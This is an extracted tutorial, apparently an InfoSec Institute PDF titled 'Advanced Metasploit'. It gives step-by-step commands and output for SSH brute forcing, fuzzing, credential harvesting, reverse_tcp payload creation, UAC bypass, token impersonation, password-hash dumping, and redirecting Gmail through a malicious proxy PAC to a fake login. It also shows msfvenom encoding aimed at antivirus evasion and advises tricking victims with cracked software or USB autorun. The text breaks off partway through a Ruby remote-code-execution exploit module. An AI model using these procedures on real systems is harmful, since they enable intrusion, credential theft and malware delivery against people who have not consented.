contentsresources.infosecinstitute.com/wp-content/uploads/...metasploit.pdfadvanced metasploit 3...
TRANSCRIPT
Contents Introduction ............................................................................................................................................................................... 3
1. AUXILIARY .............................................................................................................................................................................. 4
1.a Scanners ........................................................................................................................................................................... 4
1.b Fuzzers ............................................................................................................................................................................. 7
1.c Credential harvesting ..................................................................................................................................................... 11
2. POST EXPLOITATION ............................................................................................................................................................ 14
2.a privilege escalation ........................................................................................................................................................ 14
2.b IE proxy PAC ................................................................................................................................................................... 26
3. MISCELLANEOUS .................................................................................................................................................................. 34
3.a NOP generator ............................................................................................................................................................... 34
3.b encoders ........................................................................................................................................................................ 37
4. Advanced module/payload configuration options .............................................................................................................. 40
5. Writing custom Metasploit modules. .................................................................................................................................. 43
6. Stealthy techniques when using Metasploit. ....................................................................................................................... 48
Advanced Metasploit 3
Introduction Metasploit is an open source application for security that was created by HD in 2003. Many exploits are contained in
Metasploit, because Metasploit has a framework, which allows any user access to any modules desired. Metasploit has
the architecture shown below:
FIGURE 1: METASPLOIT ARCHITECTURE
At this time, I will explain how to use Metasploit to take over a computer by scanning SSH and then performing
BRUTEFORCE to find the username and password. I will also show how to perform FUZZING. Here I will also explain how
one can use ENCODER techniques to create a Trojan that is undetected by antivirus. I will also explain how a person can
use fake login techniques for credential harvesting. In addition, I will show how, when you have entered the target com-
puter, you can manipulate several processes with stealthy techniques when using Metasploit, taking the user token on the
target computer, changing the username and password, etc., and injecting it with techniques of privilege escalation. Final-
ly, I will I explain how to create a custom module on Metasploit and use NOP sled to make your exploits stable, and how
someone using PROXYPAC can steal your bank account.
Advanced Metasploit 4
1. AUXILIARY AUXILIARY is a collection of modules that do not use a payload. Functions of the auxiliary modules include port scanning,
fingerprinting, service scanners, etc. Auxiliary modules also include several different types of protocols, such as scanners,
network protocol fuzzers, wireless, and denial of service.
1.a Scanners This module, contained in auxiliary, scans to find the information on targets ranging from open ports to even identifying
the OS in use by the target. See the illustrations below:
FIGURE 2: SSH BRUTEFORCE
The illustration shows how an attacker gains access at a company that provides Wi-Fi to visitors.
This module has several features to scan applications such as DCERPC, Discovery, FTP, HTTP, IMAP, MSSQL, MySQL, Net-
BIOS, POP3, SMB, SMTP, SNMP, SSH, Telnet, TFTP, VMWare, and VNC. For this article, I’m scanning SSH, using the auxiliary
SSH module to scan and using brute force for the username and password. To get started, type msfconsole on the termi-
nal.
root@sungai:~# msfconsole
FIGURE 3: STARTING METASPLOIT
Advanced Metasploit 5
After Metasploit loads, I use the module ssh_login with the following command:
msf > use auxiliary/scanner/ssh/ssh_login
Then I set the target to be scanned with the command:
msf auxiliary(ssh_login) > set RHOSTS 192.168.109.132
RHOSTS => 192.168.109.132
FIGURE 4: SETTING IP TARGET
After I use the ssh_login module, I must have a dictionary to brute-force the SSH login. To perform user configuration and
pass list using the existing dictionary, I use the following command:
msf auxiliary(ssh_login) > show options
FIGURE 5: SEE THE COMMAND FOR SETTING DICTIONARY
I then use USERPASS_FILE options for setting the dictionary list:
msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/Metasploit-
framework/data/wordlists/root_userpass.txt
Advanced Metasploit 6
FIGURE 6: SETTING USERPASS_FILE
After setting wordlists to be used for brute force, I run that module with this command:
msf auxiliary(ssh_login) > run
Note: The more userpass wordlists are used, the longer the process.
Results of the scanning SSH will look more or less like the following image.
FIGURE 7: STARTING BRUTE FORCE SSH
You can see that the results are as shown below:
[*] 192.168.109.1:22 SSH - Starting brute force
[*] Command shell session 2 opened (192.168.109.130:53371 -> 192.168.109.1:22)
at 2015-08-30 03:24:14 -0400
[+] 192.168.109.1:22 SSH - [01/52] - Success: 'cupenkz':'it-trad.com'
'uid=1001(cupenkz) gid=1003(cupenkz) groups=1003(cupenkz) con-
text=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux lo-
calhost.localdomain 3.19.2-201.fc21.x86_64 #1 SMP Tue Mar 24 03:08:23 UTC 2015
x86_64 x86_64 GNU/Linux '
IP Target 192.168.109.1, Port 22, has a user access name “cupenkz” with password ”it-trad.com.” After getting the target,
the following command can be used to do the checking:
msf auxiliary(ssh_login) > sessions -i
Note:
-i is the command for interacting with ID number
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
Advanced Metasploit 7
2 shell linux SSH cupenkz:it-trad.com (192.168.109.1:22) 192.168.109.130:53371 -> 192.168.109.1:22 (192.168.109.1)
3 shell linux SSH cupenkz:it-trad.com (192.168.109.1:22) 192.168.109.130:36248 -> 192.168.109.1:22 (192.168.109.1)
FIGURE 8: RESULT OF SSH BRUTEFORCE
After the session begins, you can directly interact with the target using the command:
msf auxiliary(ssh_login) > sessions -i 2
Note:
-i is the command for interact with ID number
The purpose of the command is to run session number 2.
FIGURE 9: RUNNING SESSION 2
After you get shell on the target, you only have access as a user, but you could gain root access if you know the vulnerabil-
ity in the OS.
1.b Fuzzers Fuzzing is a technique in which an attacker exploits the weaknesses of an application that is used by the target. Usually
these weaknesses could cause the target to crash, which can even provide access into the target terminal. In Metasploit,
Advanced Metasploit 8
there are several modules that can be used for such an application, including DNS, FTP, SSH, HTTP, SMB, SMTP, and TDS.
However, not all versions of these applications be attacked using a fuzzer module contained in Metasploit.
This technique is illustrated below:
FIGURE 10: ILLUSTRATION OF FUZZING SSH
The illustration shows that, if a company has Wi-Fi access, it can be accessed by others and abused. Attackers can scan the
company’s computers. In addition, if the company has a vulnerability in its SSH application, SSH on its computers can be
targeted to cause a crash.
To start fuzzing, you must run Metasploit first with the command:
root@sungai:~# msfconsole
FIGURE 11: RUNNING METASPLOIT
After Metasploit runs, use the command below to run the SSH fuzzer.
msf > use auxiliary/fuzzers/ssh/ssh_version_corrupt
msf auxiliary(ssh_version_corrupt) >
However, before using the ssh fuzzer module, maybe we should scan the target first, using the nmap simply to ascertain
whether the target is using SSH or not. I use the command:
root@sungai:~# nmap -sS -v -A 192.168.109.1
Note:
-sS is the command for scanning the TCP SYN packet
Advanced Metasploit 9
-v is the command for verbose (resulting in detailed scanning)
-A is the command for detecting the OS used, version, script scanning, and traceroute
Results of the scan are shown below:
FIGURE 12: HASIL SCANNING NMAP
You can see from the picture that the IP 192.168.109.1 is using OpenSSH, version 6.6.1, with port 22 open.
After viewing the information that is used by the SSH module fuzzer, you can use the command:
msf auxiliary(ssh_version_corrupt) > info
The following information can be seen:
MAXDEPTH specifications for testing on the target byte
RHOST is an IP target
RPORT is a port target.
Before running the SSH module fuzzer, I have to apply the settings for the MAXDEPT and RHOST as follows:
Advanced Metasploit 10
FIGURE 13: SETTING MAXDEPTH AND RHOST SSH FUZZER
The picture above shows the settings for the specification of bytes sent, the target IP, and the target port.
To perform settings, use the command:
msf auxiliary(ssh_version_corrupt) > set maxdepth 999999999999
maxdepth => 999999999999
msf auxiliary(ssh_version_corrupt) > set rhost 192.168.109.1
rhost => 192.168.109.1
After the settings are correct, you can run with this command:
msf auxiliary(ssh_version_corrupt) > run
FIGURE 14: SSH FUZZER RUNNING
Advanced Metasploit 11
The picture above shows Metasploit using fuzzing against the target, but not all versions of SSH have this vulnerability. So,
if SSH in the target does not crash, there is the possibility that SSH is already in the patch.
1.c Credential harvesting Credential harvesting is a social engineering technique that is used to get a user and password for user login, SSH, and
others. This technique has many variations through which an attacker can create a payload to get a username/password
login and other information. An illustration of credential harvesting is shown below.
FIGURE 15: CREDENTIAL HARVESTING
The image above shows that the attacker can retrieve user and password targets using AutoLogin if the target has Auto-
Login settings.
First, we must have access to a computer target for use in the credential harvesting technique.
I gain access using Meterpreter, as shown below:
FIGURE 16: METERPRETER CONNECTED
After connecting with Meterpreter, I run Meterpreter as a background service. Then I search the credential module using
the following command:
msf exploit(handler)> search credential
FIGURE 17: SEARCHING CREDENTIAL MODULE
In Metasploit, there are many module credentials, but I use the module
post/windows/gather/credentials/windows_autologin. To access this module, I use the following command:
msf exploit(handler)> use post/windows/gather/credentials/windows_autologin
Advanced Metasploit 12
FIGURE 18: USING MODULE POST/WINDOWS/GATHER/CREDENTIALS/WINDOWS_AUTOLOGIN
After that, I can see more options in this module with the command:
msf post(windows_autologin)> show options
FIGURE 19: SHOWING OPTION MODULE WINDOWS_AUTOLOGIN
The above picture shows an option contained in the module. Here I am just setting part of the session, which is used with
the command:
msf post(windows_autologin)>sessions -i
FIGURE 20: SEEING SESSION ACTIVE IN TARGET
msf post(windows_autologin)> set sessions 1
FIGURE 21: SETTING SESSION ON MODULE WINDOWS AUTO LOGIN
After setting the module, I run this module with the command:
Advanced Metasploit 13
msf post(windows_autologin)> exploit
FIGURE 22: EXPLOIT RUNNING
The illustration shows how the exploit reveals the password and username information contained on the target computer:
user: cupenkz
password [No Password!]
Domain: FATBOYGAG-SLIM
When the target computer does not have a set auto login, the exploit does not work and shows something like the image
below:
FIGURE 23: EXPLOIT NOT WORKING
Advanced Metasploit 14
2. POST EXPLOITATION Another technique that the attacker can use to gain further access to the target's internal network is packet sniffing. An
attacker can also put a backdoor to retain access to the target.
2.a privilege escalation This technique allows an attacker to take over the target computer by taking advantage of an exposed vulnerability. Once
the computer is taken over, the attacker tries to raise user access, as in the following illustration:
FIGURE 24: PRIVILEGE ESCALATION
In this example, my target is Windows 7 Ultimate 32 bit. To do the scanning to find the OS used, I use the command:
root@sunga : nmap –sS –v –A 192.168.130.1
FIGURE 25: SCANNING USE NMAP
Note:
-sS is the command for scanning by using the TCP SYN packet
-v is the command for verbose (resulting in detail scanning)
-A is the command for detecting the OS used, version, script scanning, and traceroute
The results are as shown below.
Advanced Metasploit 15
FIGURE 26: THE RESULT FROM SCANNING USE NMAP
To perform privilege escalation, I first made the application form execute the payload; then the target will be connected
with a computer attacker. I use msfpayload with the command:
sungati@root : msfpayload windows/Meterpreter/reverse_tcp
LHOST=192.168.130.128 LPORT=4444 x > /var/www/cupenkz.exe
FIGURE 27: LOADING MSFPAYLOAD TO MAKE A MALICIOUS FILE
Note:
- Msfpayload command creates a payload using reverse_tcp
- LHOST is an IP attacker
- LPORT is a computer port attacker
- X command creates an exe file named cupenkz.exe
After making the application payload, you need to trick the unsuspecting targets in order to use the payload silently, such
as by combining it with a program like crack or install autoscript usb, which is useful when installed in the target computer;
then the application will run. In this case, I just give an example of how best to move so that the application is executed
with the target.
After that, I run the exploit handler on a computer attacker, with the command:
FIGURE 28: USING EXPLOIT/MULTI/HANDLER IN COMPUTER ATTACKER
Advanced Metasploit 16
The function of the above command is that, when cupenkz.exe is executed with a target computer, the attacker computer
is ready to receive the payload and open a reverse connection from the target computer.
FIGURE 29: RUNNING EXPLOIT HANDLER AND THE TARGET 192.168.130.1 CONNECTED FOR RUNNING THE PROGRAM CUPENKZ.EXE
After setting the LHOST attacker on the computer, I run the command:
msf exploit(handler) > run
Then, when one of the files that we uploaded earlier (cupenkz.exe) is executed by the target, it will look like the image
above.
The above-owned user access is usually limited to the user, not the administrator or root.
FIGURE 30: ACCESS IS DENIED
I tried to do getsystem when it was targeted with the command:
Meterpreter > getsystem
FIGURE 31: GETSYSTEM FAIL
The above condition is that we have only limited access to user, and cannot access to the system; I view it with the com-
mand:
Meterpreter > getuid
Advanced Metasploit 17
FIGURE 32: THE POSITION OF THE CURRENT USER
After that, I review the information contained in getsystem with the command:
Meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t <opt> The technique to use. (Default to ”0”).
0. All techniques available
1. Service - Named Pipe Impersonation (In Memory/Admin)
2. Service - Named Pipe Impersonation (Dropper/Admin)
3. Service - Token Duplication (In Memory/Admin)
There are three functions that are used to increase user access to a target computer, among others.
The first function is 1. Service - Named Pipe Impersonation (In Memory/Admin), where the attacker does the exploit on
the target computer, usually as a local exploit. Local exploits are used to take over the target computer in full. I first run
Meterpreter as background, with the command:
FIGURE 33: RUNNING METERPRETER AS BACKGROUND
msf exploit(handler) > search uac
Advanced Metasploit 18
FIGURE 34: SEARCHING MODULE LOCAL EXPLOIT BYPASSUAC
msf exploit(handler) > use/exploit/windows/local/bypassuac
Above I’m searching a Windows 7 computer with the local exploit with the name bypass UAC, and then I set the session on
a local exploit.
FIGURE 35: SETTING SESSION
msf exploit(bypassuac) > set SESSION 2
After the setting session is complete, I run the exploit locally with the command:
msf exploit(bypassuac) > exploit
Advanced Metasploit 19
FIGURE 36: RUNNING BYPASSUAC EXPLOIT LOCAL WINDOWS 7
Session 2 has been created by using local exploit bypassuac to replace the session with the command:
msf exploit(bypassuac) > sessions -i
msf exploit(bypassuac) > sessions –i 2
FIGURE 37: CHANGING SESSION
msf exploit(bypassuac) > sessions -i 2
After running this, I will try to identify whether user access is no longer restricted.
FIGURE 38: ACCESS BY USING GETSYSTEM
The picture above shows where the system is created using a local exploit. Here I took over the account system; in other
words, the root account. If you have the root account, then you can take over the entire contents of the target computer.
Advanced Metasploit 20
UAC (user account control) is a security feature in Windows. Each function that appears to be accessing files or applica-
tions on a Windows system will display a warning from UAC asking for confirmation as a security feature. This feature can
be deactivated (disabled) so you are not disturbed by the frequent Windows question, "Do you want to allow the follow-
ing program to install software on this computer?"
UAC/user account control is a technology and security infrastructure introduced with Microsoft’s Win-
dows Vista and Windows Server 2008 operating systems, with a more relaxed[1] version also present in
Windows 7 and Windows Server 2008 R2. It aims to improve the security of Microsoft Windows by limit-
ing application software to standard user privileges until an administrator authorizes an increase or ele-
vation. In this way, only applications trusted by the user may receive administrative privileges, and mal-
ware should be kept from compromising the operating system. In other words, a user account may have
administrator privileges assigned to it, but applications that the user runs do not inherit those privileges
unless they are approved beforehand or the user explicitly authorizes it.
Why do we need an exploit to bypass UAC? The exploit is a technique by which we can take over the targeted computer.
There are two types of exploit attacks, namely remote and local. Usually a remote exploit is used when an application on
the target has a vulnerability that can be accessed remotely (via the port connection). In this example, we use SSH, FTP,
etc. A local exploit usually finds the cracks in the application contained on the targeted computer. See the illustration be-
low.
FIGURE 39: REMOTE EXPLOIT
The figure shows a remote exploit, with the attacker scanning SSH on the target and finding a SSH vulnerability. Then the
attacker can attack using a remote SSH exploit.
FIGURE 40: LOCAL EXPLOIT
The illustration shows the attacker performing remote ssh in the open and seeing that the target computer’s UAC feature
can be bypassed, so the user privileges can be raised, and the attacker uses the local exploit bypassuac on the target com-
puter. This shows the difference between a local exploit and a remote exploit.
Bypass UAC is a technique that raises the standard user access rights to be an administrator without requiring authoriza-
tion from the target. In this example, I used the payload bypassUAC on Metasploit. This technique will create an executa-
ble file and find the Windows directory to which to upload it. Then the file is injected and, if the file is executed, it will
change the permissions of the user to be an administrator. An illustration can be seen in the figure below:
Advanced Metasploit 21
FIGURE 41: BYPASSUAC
The illustration shows approximately how UAC is bypassed:
1. Meterpreter connect—attacker must have a connection to the target through Meterpreter.
2. Upload malicious—attacker creates a malicious file using bypassuac, then uploads it to the target computer and
puts it in a specific directory on system target.
3. Execute file—attacker executes files that have been created earlier.
4. Create session for Meterpreter—malicious file creates a session that is integrated through Meterpreter.
The second function is 2. Service - Named Pipe Impersonation (Dropper / Admin)
While the above function is aimed at a file system on the target computer, here I use Windows API with railgun, which is
one of the applications contained in Metasploit. Railgun is an application that can interact and gain full access using Win-
dows API.
For information contained in the Windows API documentation on the website, you can look at msdn.microsoft.com, be-
cause I am not going to explain much here about the API function in Windows.
Here I use an IRB shell to run railgun, with the command:
Meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the Meterpreter client
After that, I see what DLLs are used in this module that already exist in railgun, with the command:
>> client.railgun.known_dll_names
=> ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32",
"shell32", "netapi32", "crypt32", "wlanapi", "wldap32", "version"]
>>
FIGURE 42: DLLS USED IN RAILGUN
The above are the default 12 DLLs that can be used in railgun; here I use netapi32 to change user admin on the target
computer.
First, I must check what user is already present on the target with the command:
Meterpreter > hashdump
ad-
min:1003:aad3b435b51404eeaad3b435b51404ee:3008c87294511142799dca1191e69a0f:::
Advanced Metasploit 22
Administra-
tor:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cu-
penkz:1004:aad3b435b51404eeaad3b435b51404ee:ebb51400c232862211db317da0793bc9:::
fat-
boygagslim:1000:aad3b435b51404eeaad3b435b51404ee:7398d3b8ece0f71589fbfa3d3c54480f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Updatu-
sUser:1001:aad3b435b51404eeaad3b435b51404ee:0d7025661596df7289a35b32f20b4bb8:::
FIGURE 43: CUPENKZ USER PASSWORD BEFORE CHANGING EBB51400C232862211DB317DA0793BC9
The above shows six users who are on the target computer; now I'll try change the password cupenkz using the following
command:
>> client.railgun.netapi32.NetUserChangePassword(nil, "cupenkz", "cupenkz",
"cupenkz123")
Note:
- client.railgun.netapi32.NetUserChangePassword <= command to use neta-
pi32.dll and use the function NetUserChangePassword
- nil <= domainname
- cupenkz <== username
- cupenkz <== oldpassword
- cupenkz123 <== newpassword
FIGURE 44: COMMAND NETUSERCHANGEPASSWORD, NETAPI32 SUCCESSFULLY
To check if the cupenkz password has been replaced or not, I checked with the command:
Meterpreter > hashdump
Advanced Metasploit 23
ad-
min:1003:aad3b435b51404eeaad3b435b51404ee:3008c87294511142799dca1191e69a0f:::
Administra-
tor:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cu-
penkz:1004:aad3b435b51404eeaad3b435b51404ee:cd84df77d079b66945e777398b4d4937:::
fat-
boygagslim:1000:aad3b435b51404eeaad3b435b51404ee:7398d3b8ece0f71589fbfa3d3c54480f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Updatu-
sUser:1001:aad3b435b51404eeaad3b435b51404ee:0d7025661596df7289a35b32f20b4bb8:::
FIGURE 45: CUPENKZ PASSWORD HAS BEEN REPLACED TO BECOME CD84DF77D079B66945E777398B4D4937
You can see the cupenkz password before is cd84df77d079b66945e777398b4d4937; the password that was changed ear-
lier is ebb51400c232862211db317da0793bc9.
For more details, I look at the functions that are on netapi32.dll in this directory:
root@sungai:cd /usr/share/Metasploit- frame-
work/lib/rex/post/Meterpreter/extensions/stdapi/railgun/def
root@sungai:/usr/share/Metasploit- frame-
work/lib/rex/post/Meterpreter/extensions/stdapi/railgun/def# less
def_netapi32.rb
see function NetUserChangePassword
dll.add_function('NetUserChangePassword', 'DWORD', [
["PWCHAR","domainname","in"],
["PWCHAR","username","in"],
["PWCHAR","oldpassword","in"],
["PWCHAR","newpassword","in"]
])
Above is a function that allows the user to change the password using railgun with netapi32.dll. After you change the user,
you can only login using RDP. This technique could possibly be used when you are a user/guest, but you want to get more
access to the admin/root; then you can just replace the users, or create new functions to be added as admin.
Advanced Metasploit 24
For the third function 3: Service - Token Duplication (In Memory/Admin), which involves stealing the token in the system, I
am using an application on Metasploit incognito to steal the token on the target system. Use the command:
Meterpreter > use incognito
Loading extension incognito...success.
Meterpreter >
FIGURE 46: USING INCOGNITO
Then I check the username used in this Meterpreter, with the command:
Meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Now I see in list_token anything contained on the system with the command:
Meterpreter > list_tokens -u
Delegation Tokens Available
========================================
fatboygag-slim\fatboygagslim
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
fatboygag-slim\UpdatusUser
NT AUTHORITY\ANONYMOUS LOGON
Advanced Metasploit 25
FIGURE 47: LISTING TOKENS USED IN TARGET
Note:
-u command for see list token
There are two tokens, DELEGATION and IMPERSONATION. DELEGATION is a token that can interact using the remote, but
it is not permanent, unlike the IMPERSONATION token.
After that, I would choose the token using the command:
Meterpreter > impersonate_token
Usage: impersonate_token <token>
Instructs the Meterpreter thread to impersonate the specified token. All oth-
er actions will then be made in the context of that token.
Hint: Double backslash DOMAIN\\name (Meterpreter quirk)
Hint: Enclose with quotation marks if name contains a space
Meterpreter >
FIGURE 48: IMPERSONATE_TOKEN
Here I will try to use the user token "fatboygag-slim fatboygagslim \\", with the command
Meterpreter > impersonate_token fatboygag-slim\\fatboygagslim
[+] Delegation token available
Advanced Metasploit 26
[+] Successfully impersonated user fatboygag-slim\fatboygagslim
FIGURE 49: IMPERSONATE_TOKEN SUCCESSFULLY
To check whether the token has been successfully used, I use the command:
Meterpreter > getuid
Server username: fatboygag-slim\fatboygagslim
FIGURE 50: IMAGE GETUID TOKEN SUCCESSFULLY
From the above explanation, we see that, when we are connected to the target, then we can use the existing user token
on the computer by using incognito.
2.b IE proxy PAC This is a technique in which the attacker can insert a fake login on a website by performing exploitation on IE so that,
when the target is open on the web, the password will be captured by the attacker, as shown below.
FIGURE 51: IE PROXY PAC
To run this technique, you should already have access to the target computer. Here, I use Meterpreter on the target using
the exploit me08_067_netapi, as shown in the following illustration:
Advanced Metasploit 27
FIGURE 52: METERPRETER USING EXPLOIT ME08_067_NETAPI
After I have opened the target with Meterpreter, I look for the ie_proxypac exploit with this command:
msf exploit(ms08_06_netapi) > search ie_proxy
FIGURE 53: SEARCHING IE_PROXY MODULE
After searching, there is one module for ie_proxy, and then I use the command:
msf exploit(ms08_06_netapi) > use post/windows/manage/ie_proxypac
Advanced Metasploit 28
FIGURE 54: INFO MODULE IE_PROXYPAC
The picture above shows a brief description of the module ie_proxypac. To run the module, I see the first option is to look
at at the previous settings. I use the command:
msf post(ie_proxy) > show options
FIGURE 55: OPTION MODULE IE_PROXYPAC
In the module above, there are five options that must be set, but for AUTO DETECT and DISABLE PROXY I’m using the de-
fault. For the REMOTE_PAC, the setting will load a .pac file on remote, and LOCAL_PAC is a setting where there is a .pac
file on the computer attacker, which is a previously made .pac file on the local computer. I put the path
/var/www/cupenkz.pac .pac file to fill the .pac file, as shown below:
Advanced Metasploit 29
FIGURE 56: CONTENT FILE CUPENKZ.PAC
The picture above shows a .pac file that will open www.gmail.com and the target computer will be redirected to the IP
192.168.109.130. The IP is already in post fake login.
After that, I did the setting for LOCAL_PAC with the command:
msf post(ie_proxy) > set LOCAL_PAC /var/www/cupenkz.pac
FIGURE 57: SETTING LOCAL_PAC
After setting the file .pac , I set a SESSION number on which to run the file. However, before that I check that SESSION is at
the target using the command.
msf post(ie_proxy) > sessions -i
Note:
-i is the command for interact with ID number
Advanced Metasploit 30
FIGURE 58: CHECKING ACTIVE SESSION
A session can be active only once; after that, do the settings with the command:
msf post(ie_proxy) > set SESSIONS 1
Note:
-i is the command for interacting with the ID number
FIGURE 59: SETTING SESSION USE NO 1
After all the settings are done, then run the command:
msf post(ie_proxy) > exploit
FIGURE 60: RUNNING IE_PROXYPAC
The picture above shows the information that the .pac file from the local computer will upload to the target computer
with the following command:
C:\Documents and settings\NetworkService\Application Data\hFTVnk.pac
Advanced Metasploit 31
To ascertain whether the .pac file has been set on the target computer, I check the target. I open IE, chose menu Internet
Options, and select the option as shown below.
FIGURE 61: INTERNET OPTION IE
After that, I choose Connection and LAN setting
The result obtained can be seen in the following settings.
Advanced Metasploit 32
FIGURE 62: SETTING IE INTERNET OPTION
The picture above shows setting the proxypac on IE, where the file hFTVnk.pac is configured as the IE proxy pac. To verify
whether the file proxy is mounted, run IE and open www.gmail.com, as shown below:
FIGURE 63: DISPLAYING IE ON TARGET WHEN IT OPENS WWW.GMAIL.COM
Advanced Metasploit 33
To better ascertain whether hF Vnk.pac is loaded or not, I use View Source and look for the link authentication used, as
shown below:
FIGURE 64: VIEWING SOURCE PROXYPAC
As can be seen, www.gmail.com is the link that is opened in IE, because the attached file authentication cupenkz.html, if
there is a login it, will immediately redirect to www.mail.google.com.
The advantage of using this technique is the URL address to the web browser is almost similar to the original, so it is less
likely to be suspected.
Advanced Metasploit 34
3. MISCELLANEOUS A function of this technique is bypassing security contained in the target. As a small example, it can bypass antivirus and
IDS (instruction detecting system).
3.a NOP generator NOP (no operation) is a technique by which NOP commands are used to add some bytes to the exploit payload. The func-
tion of adding bytes is to solve the problem of finding the original EIP address of a buffer, effectively increasing the target
area.
As an example from everyday life is a glass that can be filled with 500ml of water. If we fill it with 501ml water, the water
will be spilled out of the glass. Similarly, with the buffer-overflow technique, an application that can store 500 bytes of
data is filled with 501 bytes, causing it to crash. Think of it this way: After the fuzzing finds that the EIP application lies in
510 bytes and the shellcode contains 100 bytes, it is possible to add 410 bytes of NOPs.
For an illustration of how NOP works, see the diagram below:
FIGURE 65: NOP WORKING
The above illustration shows how NOP works: NOP makes a jump to the next address so that the end of the NOP com-
mand calls the shellcode.
For using the NOP Generator, you must already know the NOP module contained in Metasploit.
root@sungai:~# msfconsole
Advanced Metasploit 35
FIGURE 66: START METASPLOIT
Here I will make a NOP sled using payload/windows/shell_bind_tcp, with the command:
msf > use payload/windows/shell_bind_tcp
FIGURE 67: USE SHELL_BIND_TCP PAYLOAD
As can be seen from the picture above, shell_bind_tcp can make a connection back from the target when the target exe-
cutes the payload, and then the target will be connected to the computer attacker using attacker port 4444. To execute
the payload, use the command below:
msf payload (shell_bind_tcp) > generate
Advanced Metasploit 36
FIGURE 68: GENERATE PAYLOAD
It can be seen from the results that the payload generated little endian or so-called shellcode that totals 341 bytes. Here is
a NOP function can add value to the shellcode. To try it out, can use the command.
msf payload (shell_bind_tcp) > generate -s 14
Note:
-s is the command to add how many bytes on NOP
Advanced Metasploit 37
FIGURE 69: GENERATE USE -S NOP SLED
The shellcode, as can be seen from the above, now contains 355 bytes. The “-s command 14” adds a NOP sled of 14 bytes
to the shellcode. The function of the NOP sled is the same thing that I illustrated by the water in a glass. If the shellcode
does not crash the application being fuzzed, the NOP sled is one way in which values can be added to exploit the shellcode
running.
3.b encoders This is a technique that is used to bypass anti-virus or IDS/IPS. It is usually used by someone to create a Trojan and is not
detected by anti-virus software.
At this time, I will make a payload.exe using msfvenom with the command:
root@sungai : ~# msfvenom -p windows/Meterpreter/reverse_tcp
LHOST=192.168.109.130 LPORT=6969 -x -f exe >
/root/Desktop/cupu.exe
Note:
-p is the command to choose the payload used
-x is the command to specify a custom executable file to use as a template
-f is the command for an output format file to be produced
FIGURE 70: CREATE FILE CUPU.EXE
You can see in the picture above that msfvenom makes a file with the name “cupu.exe” by using the payload win-
dows/Meterpreter/reverse_tcp and, if this file is executed in the target, the target will be connected to the attacker's IP
192.168.109.130 using Port 6969.
Advanced Metasploit 38
Here I will check the cupu.exe file by using www.virustotal.com:
FIGURE 71: RESULT SCANNING CUPU.EXE
The illustration above shows that the cupu.exe file is detected by three antivirus programs out of 56. However, here I am
trying to encode the cupu.exe file to cupenkz.exe to be undetected by AV software. Use the command:
root@sungai : ~# msfvenom -p windows/Meterpreter/reverse_tcp
LHOST=192.168.109.130 LPORT=6969 -x -f exe -e
x86_shikata_ga_nai> /root/Desktop/cupenkz.exe
Note:
-p is the command for choosing what payload is used
-x is the command for specifying a custom executable file to use as a tem-
plate
-f is the command for output format file, yang akan di hasilkan
-e is the command for choosing the encryption you want to be used
To the above command, I add the encode options -e x86_shikata_ga_nai, and the results of the cupenkz.exe file on scan-
ning www.virustotal.com, as shown below.
Advanced Metasploit 39
FIGURE 72: RESULT SCANNING FILE CUPENKZ.EXE AT VIRUSTOTAL.COM
The picture above shows that the cupenkz.exe file as completely undetectable by antivirus software, using shikata_ga_nai
encoding.
Advanced Metasploit 40
4. Advanced module/payload configuration options These are techniques whereby, when we're loading a module, we can set parameters in advance, by which I mean that it
can automatically make an order in the attack. For example, use this command:
msf auxiliary (ssh_login) > show advanced
FIGURE 73: SETTING SHOW ADVANCED MODULE SSH_LOGIN
The above is an advanced setting for auxiliary ssh_login scanners; it can be seen that there are some settings and also a
description. To change the settings, use the command:
msf auxiliary (ssh_login) > set Name CurrentSetting
example:
msf auxiliary (ssh_login) > set autorunscript /post/linux/gather/enum_config
FIGURE 74: CHANGE SETTING AN AUTORUNSCRIPT
enum_conf command is to take some of the configuration information contained on target; to check whether the setting
has been changed or not , use a command like this:
msf auxiliary (ssh_login) > show advanced
Advanced Metasploit 41
FIGURE 75: AUTORUNSCRIPT SETTING HAS BEEN CHANGED
You can see in the picture above that the setting for AutoRunScript has turned into post/linux/gather/enum_config. This
affects the actual setting when you want to attack with their own methods, because usually this method depends on the
situation and conditions in the field.
AutoRunScript can be seen from the results of the run, as shown below:
FIGURE 76: RESULT FROM AUTORUNSCRIPT
The picture above shows that the OS used by the target is Fedora 21 and there is some log information that has been
stored on the computer attacker. By using AutoRunScript, you can make an attack and obtain the information contained in
the target. Examples of the information obtained are shown below.
Advanced Metasploit 42
FIGURE 77: RESULT LOG FROM AUTORUNSCRIPT
The picture above shows the results log on Samba configuration, and shows where the log files are stored by the comput-
er attacker.
Advanced Metasploit 43
5. Writing custom Metasploit modules. Writing custom Metasploit modules allows you to create your own module and load it into Metasploit. However, to make
the module, you should understand the programming language Ruby. Here I have an example exploit that I took from ex-
ploit-db.com:
FIGURE 78: EXPLOIT FROM EXPLOIT-DB.COM
The source above is made by w3tw0rk, who made an exploit by utilizing the vulnerability of applications Pitbul IRC Bot.
Here's the source:
_________________________________________________snip_______________________________________________
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'w3tw0rk / Pitbul IRC Bot Remote Code Execution',
'Description' => %q{
This module allows remote command execution on the w3tw0rk / Pitbul IRC
Bot.
},
'Author' =>
[
'Jay Turla'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '120384' ],
[ 'EDB', '36652' ]
],
'Platform' => %w{ unix win },
Advanced Metasploit 44
'Arch' => ARCH_CMD,
'Payload' =>
{
